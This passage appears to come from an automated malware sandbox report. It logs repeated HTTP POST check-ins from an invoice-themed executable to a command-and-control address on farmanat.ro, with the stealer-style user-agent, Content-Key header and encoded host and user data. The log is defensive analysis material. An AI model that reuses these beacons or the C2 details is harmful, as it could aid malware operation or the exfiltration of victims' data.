                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              768192.168.11.2050616176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:37.058855057 CET7375OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:37.092895031 CET7375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:37.142956018 CET7376INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              769192.168.11.2050617176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:37.563383102 CET7377OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:37.596916914 CET7377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:37.645782948 CET7377INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              77192.168.11.2049914176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:49.359585047 CET6422OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:49.393876076 CET6422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:49.444181919 CET6423INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              770192.168.11.2050618176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:38.018762112 CET7378OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:38.053430080 CET7378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:38.104346037 CET7379INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              771192.168.11.2050619176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:38.499059916 CET7379OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:38.532474995 CET7379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:38.581376076 CET7380INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              772192.168.11.2050620176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:39.022864103 CET7381OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:39.056458950 CET7381OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:39.106671095 CET7381INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              773192.168.11.2050621176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:39.521845102 CET7382OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:39.556061983 CET7382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:39.606010914 CET7383INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              774192.168.11.2050622176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:40.029449940 CET7383OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:40.063529968 CET7383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:40.114411116 CET7384INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              775192.168.11.2050623176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:40.556828022 CET7385OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:40.591095924 CET7385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:40.643548012 CET7385INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              776192.168.11.2050624176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:41.063492060 CET7386OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:41.097805023 CET7386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:41.148307085 CET7386INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              777192.168.11.2050625176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:41.563963890 CET7387OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:41.597642899 CET7387OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:41.646722078 CET7388INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              778192.168.11.2050626176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:42.044572115 CET7389OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:42.079153061 CET7389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:42.130131006 CET7389INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              779192.168.11.2050627176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:42.547775984 CET7390OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:42.581515074 CET7390OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:42.630259991 CET7390INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              78192.168.11.2049915176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:49.936381102 CET6423OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:49.969984055 CET6423OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:50.019953012 CET6424INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              780192.168.11.2050628176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:43.023086071 CET7391OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:43.056854010 CET7391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:43.108867884 CET7392INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              781192.168.11.2050629176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:43.528949976 CET7393OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:43.563225985 CET7393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:43.612893105 CET7393INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              782192.168.11.2050630176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:43.982400894 CET7394OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:44.015687943 CET7394OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:44.064980984 CET7394INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              783192.168.11.2050631176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:44.482332945 CET7395OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:44.516541958 CET7395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:44.571494102 CET7396INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              784192.168.11.2050632176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:44.983290911 CET7396OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:45.017497063 CET7397OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:45.067610979 CET7397INHTTP/1.1 404 Not Found
                                              Server: nginx
